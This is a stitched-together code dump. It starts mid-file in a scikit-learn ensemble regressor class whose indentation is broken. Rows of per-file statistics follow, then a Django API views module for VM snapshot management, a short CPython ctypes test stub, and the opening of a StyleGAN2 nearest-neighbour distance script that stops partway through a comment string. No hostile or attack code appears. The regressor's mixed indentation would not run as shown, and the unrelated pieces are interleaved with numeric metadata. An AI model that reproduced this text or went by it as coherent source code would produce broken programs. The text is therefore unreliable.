self.__RF_model.fit(self.__X_train,self.__y_train)
print(f'RF_score : {r2_score(self.__y_test,self.__RF_model.predict(self.__X_test))}')
def AB_model_fit(self,param_grid=None):
from sklearn.ensemble import AdaBoostRegressor
AB_model = AdaBoostRegressor()
        if param_grid is None:
parameters = {'n_estimators' :[10,50,100,500],
'learning_rate' : [0.01,0.5,0.1,0.15,0.2],
}
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__AB_model.fit(self.__X_train,self.__y_train)
print(f'AB_score : {r2_score(self.__y_test,self.__AB_model.predict(self.__X_test))}')
def KNN_model_fit(self,list_neighbors=None):
from sklearn.neighbors import KNeighborsRegressor
        if list_neighbors is None:
            list_neighbors = [3,5,7,9,11,13,15]
        # start the best R^2 at -inf so a model is kept even when every
        # candidate scores below zero
        n_neighbor_score_model = [None, float('-inf'), None]
for neighbor in list_neighbors:
self.__KNN_model = KNeighborsRegressor(n_neighbors=neighbor)
self.__KNN_model = self.__KNN_model.fit(self.__X_train,self.__y_train)
model_score = self.__KNN_model.score(self.__X_test,self.__y_test)
if model_score > n_neighbor_score_model[1]:
n_neighbor_score_model[0] = neighbor
n_neighbor_score_model[1] = model_score
n_neighbor_score_model[2] = self.__KNN_model
self.__KNN_model = n_neighbor_score_model[2]
y_predict = self.__KNN_model.predict(self.__X_test)
print(f'KNN_score with {n_neighbor_score_model[0]} neighbors: {r2_score(self.__y_test,y_predict)}')
    def find_best(self):
        global combinations
        Total_models = self.__LA + self.__SVR + self.__RF + self.__KNN + self.__AB
        combinations = np.array(find_all_combinations(Total_models))
        all_preds = []
        count = 1
        self.__best_score = [0] + [None] * Total_models
        if self.__LA:
            all_preds.append(self.__LA_model.predict(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__SVR:
            all_preds.append(self.__SVR_model.predict(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__RF:
            all_preds.append(self.__RF_model.predict(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__AB:
            all_preds.append(self.__AB_model.predict(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__KNN:
            all_preds.append(self.__KNN_model.predict(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        all_preds = np.array(all_preds)
        # weighted blend: for every weight combination w, compute
        # sum_m w_m * y_hat_m over the stacked per-model predictions
        all_preds = np.sum(np.multiply(combinations.T, np.array([all_preds]).T).T, axis=1)
        for y_predict, comb in zip(all_preds, combinations):
latest_score = r2_score(self.__y_test,y_predict)
if latest_score > self.__best_score[0]:
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
print(f'AutoEn_score : {self.__best_score[0]}')
for i in range(len(self.__storing_model_names)):
print(f'weight for {self.__storing_model_names[i]} : {self.__best_score[i+1]}')
def predict(self,X_test):
all_proba = []
count = 1
try:
if self.__LA:
LA_model_y_predict = self.__LA_model.predict(X_test)
LA_model_y_predict = np.multiply(LA_model_y_predict,self.__best_score[count])
all_proba.append(LA_model_y_predict)
count+=1
if self.__SVR:
SVR_model_y_predict = self.__SVR_model.predict(X_test)
SVR_model_y_predict = np.multiply(SVR_model_y_predict,self.__best_score[count])
all_proba.append(SVR_model_y_predict)
count+=1
if self.__RF:
RF_model_y_predict = self.__RF_model.predict(X_test)
RF_model_y_predict = np.multiply(RF_model_y_predict,self.__best_score[count])
all_proba.append(RF_model_y_predict)
count+=1
if self.__AB:
AB_model_y_predict = self.__AB_model.predict(X_test)
AB_model_y_predict = np.multiply(AB_model_y_predict,self.__best_score[count])
all_proba.append(AB_model_y_predict)
count+=1
if self.__KNN:
KNN_model_y_predict = self.__KNN_model.predict(X_test)
KNN_model_y_predict = np.multiply(KNN_model_y_predict,self.__best_score[count])
all_proba.append(KNN_model_y_predict)
count+=1
y_predict = np.sum(all_proba,axis=0)
except AttributeError:
print('model not fitted yet')
return None
        except Exception as exc:
            print(f'prediction failed: {exc}')
            return None
return y_predict
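# --- Illustrative usage sketch (added; not part of the original module).
# Constructor arguments follow the __init__ signature above; load_diabetes is
# just a stand-in regression dataset. Assumes the module-level imports
# (numpy, scikit-learn model selection and metrics) used by the classes above.
if __name__ == '__main__':
    from sklearn.datasets import load_diabetes
    X, y = load_diabetes(return_X_y=True)
    reg = AutoEnRegressor(LA=True, RF=True, GridSearch=False, scoring='r2')
    reg.fit(X, y, validation_split=0.2)   # prints per-model and ensemble R^2
    print(reg.predict(X[:5]))             # weighted blend of base predictions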
| 43.357362
| 165
| 0.56967
| 3,330
| 28,269
| 4.361261
| 0.054955
| 0.044068
| 0.053708
| 0.049577
| 0.83564
| 0.821662
| 0.789919
| 0.76823
| 0.754252
| 0.732769
| 0
| 0.018257
| 0.341222
| 28,269
| 651
| 166
| 43.423963
| 0.761585
| 0
| 0
| 0.600823
| 0
| 0
| 0.055162
| 0.029085
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045267
| false
| 0
| 0.032922
| 0
| 0.098765
| 0.041152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9ef4cd147d43d2ad1ef9d58b3b2a7ce4421f14c7
| 19,189
|
py
|
Python
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 97
|
2016-11-15T14:44:23.000Z
|
2022-03-13T18:09:15.000Z
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 334
|
2016-11-17T19:56:57.000Z
|
2022-03-18T10:45:53.000Z
|
api/vm/snapshot/views.py
|
klebed/esdc-ce
|
2c9e4591f344247d345a83880ba86777bb794460
|
[
"Apache-2.0"
] | 33
|
2017-01-02T16:04:13.000Z
|
2022-02-07T19:20:24.000Z
|
from vms.models import SnapshotDefine
from api.decorators import api_view, request_data, setting_required
from api.permissions import IsAdminOrReadOnly
from api.utils.db import get_object
from api.vm.utils import get_vm, get_vms
# noinspection PyProtectedMember
from api.image.base.views import image_snapshot
from api.vm.snapshot.utils import get_disk_id, filter_disk_id, output_extended_snap_count
from api.vm.snapshot.vm_define_snapshot import SnapshotDefineView
from api.vm.snapshot.vm_snapshot import VmSnapshot
from api.vm.snapshot.vm_snapshot_list import VmSnapshotList
__all__ = ('vm_define_snapshot_list_all', 'vm_define_snapshot_list', 'vm_define_snapshot', 'vm_snapshot_list',
'vm_snapshot', 'image_snapshot')
#: vm_status: GET:
@api_view(('GET',))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vms() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot_list_all(request, data=None):
"""
List (:http:get:`GET </vm/define/snapshot>`) all snapshot definitions for all VMs.
.. http:get:: /vm/define/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg data.full: Return list of objects with all snapshot definition details (default: false)
:type data.full: boolean
:arg data.extended: Include total number of snapshots for each snapshot definition (default: false)
:type data.extended: boolean
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, ``hostname``, \
``created`` (default: ``hostname,-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
"""
extra = output_extended_snap_count(request, data)
# TODO: check indexes
snap_define = SnapshotDefine.objects.select_related('vm', 'periodic_task', 'periodic_task__crontab')\
.filter(vm__in=get_vms(request))\
.order_by(*SnapshotDefineView.get_order_by(data))
if extra:
snap_define = snap_define.extra(extra)
return SnapshotDefineView(request, data=data).get(None, snap_define, many=True, extended=bool(extra))
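# Illustrative client call (added; not part of the original module). The path
# and query parameters come from the docstring above; the authentication
# header depends on the deployment, so treat auth_headers as a placeholder:
#
#   import requests
#   r = requests.get(api_url + '/vm/define/snapshot',
#                    params={'full': True, 'extended': True},
#                    headers=auth_headers)  # auth scheme is deployment-specific
#   print(r.json())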
#: vm_status: GET:
@api_view(('GET',))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot_list(request, hostname_or_uuid, data=None):
"""
List (:http:get:`GET </vm/(hostname_or_uuid)/define/snapshot>`) all VM snapshot definitions.
.. http:get:: /vm/(hostname_or_uuid)/define/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.full: Return list of objects with all snapshot definition details (default: false)
:type data.full: boolean
:arg data.disk_id: Filter by disk number/ID
:type data.disk_id: integer
:arg data.extended: Include total number of snapshots for each snapshot definition (default: false)
:type data.extended: boolean
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, ``created`` \
(default: ``-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id
"""
vm = get_vm(request, hostname_or_uuid, exists_ok=True, noexists_fail=True, sr=('node', 'owner'))
query_filter = {'vm': vm}
query_filter = filter_disk_id(vm, query_filter, data)
extra = output_extended_snap_count(request, data)
# TODO: check indexes
snap_define = SnapshotDefine.objects.select_related('vm', 'periodic_task', 'periodic_task__crontab')\
.filter(**query_filter).order_by(*SnapshotDefineView.get_order_by(data))
if extra:
snap_define = snap_define.extra(extra)
return SnapshotDefineView(request, data=data).get(vm, snap_define, many=True, extended=bool(extra))
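# Illustrative client call (added): list the snapshot definitions of one disk
# of a single VM; the hostname and disk_id values are hypothetical:
#
#   r = requests.get(api_url + '/vm/web01.example.com/define/snapshot',
#                    params={'disk_id': 1, 'full': True}, headers=auth_headers)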
#: vm_status: GET:
#: vm_status: POST: running, stopped, stopping
#: vm_status: PUT: running, stopped, stopping
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'POST', 'PUT', 'DELETE'))
@request_data(permissions=(IsAdminOrReadOnly,)) # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_define_snapshot(request, hostname_or_uuid, snapdef, data=None):
"""
Show (:http:get:`GET </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`),
create (:http:post:`POST </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`),
remove (:http:delete:`DELETE </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`) or
update (:http:put:`PUT </vm/(hostname_or_uuid)/define/snapshot/(snapdef)>`)
a VM snapshot definition and schedule.
.. http:get:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.extended: Include total number of snapshots (default: false)
:type data.extended: boolean
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
.. http:post:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name (predefined: hourly, daily, weekly, monthly)
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.schedule: **required** - Schedule in UTC CRON format (e.g. 30 4 * * 6)
:type data.schedule: string
:arg data.retention: **required** - Maximum number of snapshots to keep
:type data.retention: integer
:arg data.active: Enable or disable snapshot schedule (default: true)
:type data.active: boolean
:arg data.desc: Snapshot definition description
:type data.desc: string
:arg data.fsfreeze: Whether to send filesystem freeze command to QEMU agent socket before \
creating snapshot (requires QEMU Guest Agent) (default: false)
:type data.fsfreeze: boolean
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 406: Snapshot definition already exists
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
.. http:put:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.schedule: Schedule in UTC CRON format (e.g. 30 4 * * 6)
:type data.schedule: string
:arg data.retention: Maximum number of snapshots to keep
:type data.retention: integer
:arg data.active: Enable or disable snapshot schedule
:type data.active: boolean
:arg data.desc: Snapshot definition description
:type data.desc: string
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
.. http:delete:: /vm/(hostname_or_uuid)/define/snapshot/(snapdef)
:DC-bound?:
* |dc-yes|
:Permissions:
* |Admin|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapdef: **required** - Snapshot definition name
:type snapdef: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot definition not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
"""
vm = get_vm(request, hostname_or_uuid, exists_ok=True, noexists_fail=True)
disk_id, real_disk_id, zfs_filesystem = get_disk_id(request, vm, data)
extra = output_extended_snap_count(request, data)
define = get_object(request, SnapshotDefine, {'name': snapdef, 'vm': vm, 'disk_id': real_disk_id},
sr=('vm', 'periodic_task', 'periodic_task__crontab'), extra={'select': extra})
return SnapshotDefineView(request, data=data).response(vm, define, extended=bool(extra))
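# Illustrative client call (added): create a daily snapshot definition; the
# field names mirror the POST parameters documented in the docstring above:
#
#   r = requests.post(api_url + '/vm/web01.example.com/define/snapshot/daily',
#                     json={'disk_id': 1, 'schedule': '30 4 * * *',
#                           'retention': 7, 'active': True},
#                     headers=auth_headers)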
#: vm_status: GET:
#: vm_status: PUT: running, stopped, stopping
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'PUT', 'DELETE'))
@request_data() # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_snapshot_list(request, hostname_or_uuid, data=None):
"""
List (:http:get:`GET </vm/(hostname_or_uuid)/snapshot>`) all VM snapshots or
synchronize (:http:put:`PUT </vm/(hostname_or_uuid)/snapshot>`) snapshots of VM's disk on compute node
with snapshots saved in database.
Delete (:http:delete:`DELETE </vm/(hostname_or_uuid)/snapshot>`) VM snapshots specified
by the list (data.snapnames).
.. http:get:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.full: Return list of objects with all snapshot details (default: false)
:type data.full: boolean
:arg data.disk_id: Filter by disk number/ID
:type data.disk_id: integer
:arg data.type: Filter by snapshot type (1 - Automatic, 2 - Manual)
:type data.type: integer
:arg data.define: Filter by snapshot definition name
:type data.define: string
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, \
``size``, ``created`` (default: ``-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id / Invalid snapshot type
.. http:put:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
:status 428: VM is not installed
.. http:delete:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.snapnames: **required** - List of snapshot names to be deleted
:type data.snapnames: array
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid snapnames / Invalid disk_id
:status 417: VM snapshot status is not OK
:status 423: Node is not operational / VM is not operational
:status 428: VM is not installed
"""
return VmSnapshotList(request, hostname_or_uuid, data).response()
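# Illustrative client call (added): delete two snapshots by name, per the
# DELETE parameters documented above (data.snapnames is required); the
# snapshot names are hypothetical:
#
#   r = requests.delete(api_url + '/vm/web01.example.com/snapshot',
#                       json={'snapnames': ['daily-20220101', 'daily-20220102']},
#                       headers=auth_headers)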
#: vm_status: GET:
#: vm_status: POST: running, stopped, stopping
#: vm_status: PUT: stopped
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'POST', 'PUT', 'DELETE'))
@request_data() # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_snapshot(request, hostname_or_uuid, snapname, data=None):
"""
Show (:http:get:`GET </vm/(hostname_or_uuid)/snapshot/(snapname)>`),
create (:http:post:`POST </vm/(hostname_or_uuid)/snapshot/(snapname)>`),
destroy (:http:delete:`DELETE </vm/(hostname_or_uuid)/snapshot/(snapname)>`) or
rollback (:http:put:`PUT </vm/(hostname_or_uuid)/snapshot/(snapname)>`)
a snapshot of VM's disk.
.. http:get:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 412: Invalid disk_id
.. http:post:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.note: Snapshot comment
:type data.note: string
:arg data.fsfreeze: Whether to send filesystem freeze command to QEMU agent socket before \
creating snapshot (requires QEMU Guest Agent) (default: false)
:type data.fsfreeze: boolean
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 406: Snapshot already exists
:status 412: Invalid disk_id
    :status 417: VM snapshot limit reached / VM snapshot size limit reached / DC snapshot size limit reached
    :status 423: Node is not operational / VM is not operational
    :status 428: VM is not installed
.. http:put:: /vm/(hostname_or_uuid)/snapshot/(snapname)
.. warning:: A snapshot rollback will restore disk data from the snapshot; \
All data created after the snapshot will be lost (including all newer snapshots)!
.. warning:: When restoring a snapshot into another server's disk all existing snapshots \
on the target server will be lost!
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes| - Rollback snapshot
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.force: Force recursive rollback (default: true)
:type data.force: boolean
:arg data.target_hostname_or_uuid: Target server hostname or uuid \
(default: source and destination server are the same)
:type data.target_hostname_or_uuid: string
:arg data.target_disk_id: Target disk number/ID; Makes sense (and required) only when \
``target_hostname_or_uuid`` is specified (default: not used, because the snapshot is restored on the same disk ID)
:type data.target_disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 409: VM has pending tasks
:status 412: Invalid disk_id
:status 417: VM snapshot status is not OK / VM has more recent snapshots (force=false) / \
Target VM has snapshots (force=false and target_hostname_or_uuid is set)
:status 423: Node is not operational / VM is not operational / VM is not stopped / VM is locked or has slave VMs
    :status 428: VM is not installed / VM brand mismatch / Disk size mismatch
.. http:put:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no| - Update snapshot note
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.note: **required** - Snapshot comment
:type data.note: string
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
.. http:delete:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 412: Invalid disk_id
:status 417: VM snapshot status is not OK
:status 423: Node is not operational / VM is not operational
"""
return VmSnapshot(request, hostname_or_uuid, snapname, data).response()
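# Illustrative client call (added): roll a stopped VM's first disk back to a
# named snapshot; force=true is the documented default for recursive rollback,
# and the hostname/snapshot name are hypothetical:
#
#   r = requests.put(api_url + '/vm/web01.example.com/snapshot/before-upgrade',
#                    json={'disk_id': 1, 'force': True}, headers=auth_headers)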
| 40.82766
| 120
| 0.636875
| 2,366
| 19,189
| 5.022401
| 0.101437
| 0.064798
| 0.090718
| 0.033662
| 0.820247
| 0.801397
| 0.772869
| 0.760498
| 0.718169
| 0.711605
| 0
| 0.019309
| 0.252384
| 19,189
| 469
| 121
| 40.914712
| 0.809006
| 0.74871
| 0
| 0.410714
| 0
| 0
| 0.120921
| 0.067308
| 0
| 0
| 0
| 0.004264
| 0
| 1
| 0.089286
| false
| 0
| 0.178571
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
730daf2050dff29afc293bab7dc3c14330e6afd3
| 193
|
py
|
Python
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 207
|
2018-10-01T08:53:01.000Z
|
2022-03-14T12:15:54.000Z
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 8
|
2019-06-29T14:18:51.000Z
|
2022-02-19T07:30:27.000Z
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 76
|
2020-03-16T01:47:46.000Z
|
2022-03-21T16:37:07.000Z
|
import unittest
from test.support import import_module
ctypes_test = import_module('ctypes.test')
load_tests = ctypes_test.load_tests
if __name__ == "__main__":
unittest.main()
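# This stub relies on unittest's load_tests protocol: by re-exporting
# ctypes.test.load_tests, running this file (or discovering it) pulls in the
# whole ctypes.test package. An invocation sketch (added, illustrative):
#
#   python -m unittest test.test_ctypes -v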
| 19.3
| 43
| 0.740933
| 25
| 193
| 5.16
| 0.48
| 0.232558
| 0.27907
| 0.341085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170984
| 193
| 9
| 44
| 21.444444
| 0.80625
| 0
| 0
| 0
| 0
| 0
| 0.103261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
73273f3f91426eb2164d8b8a7c4607e98f96daf2
| 34,146
|
py
|
Python
|
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | 2
|
2021-11-11T00:18:28.000Z
|
2021-12-28T01:10:25.000Z
|
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | null | null | null |
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 23 16:09:15 2020
@author: guo.1648
"""
# referenced from NN_query_testCode_forStylegan2.py,
# and NN_getDist_testCode_forBiggan.py.
# this code is for the stylegan2 sample sheet.
# this code also does 1-NN matching between the generated images and the original
# images, but the purpose is to compute the corresponding matching distance for
# each result, and then use these matching distances, together with human
# perception of each matching pair, to find the NN distance threshold: the
# largest matching distance that still satisfies 100% perceptual replication.
# Note: we will combine this stylegan2 result with the biggan result to find the threshold!
import cv2
import os
import numpy as np
#from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestNeighbors
#from skimage import img_as_ubyte
#import torchvision.transforms as transforms
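# --- Sketch of the core 1-NN matching step described above (added for
# clarity; the variable names are illustrative, not from the original script).
# Generated tiles and original images are flattened to vectors and matched
# with scikit-learn's NearestNeighbors; the returned distances are what the
# threshold search is based on:
#
#   origin_feats = origin_imgs.reshape(len(origin_imgs), -1)   # (N, H*W*C)
#   sample_feats = sample_imgs.reshape(len(sample_imgs), -1)
#   nn = NearestNeighbors(n_neighbors=1).fit(origin_feats)
#   dists, idxs = nn.kneighbors(sample_feats)                  # 1-NN per tile
#   # dists[i] is the matching distance recorded for generated image i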
"""
#### for FLOWER_128: 8189 images dataset (the original FLOWER dataset)
src_sampleSheetImg = '/scratch/stylegan2/results/results_FLOWER_128/00000-stylegan2-FLOWER_128-1gpu-config-f/fakes002526.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128: 8189 images dataset (the original FLOWER dataset)
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/fakes001925.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchDist.txt'
"""
"""
#### for FLOWER_128_sub1000: 1000 images dataset (resume)
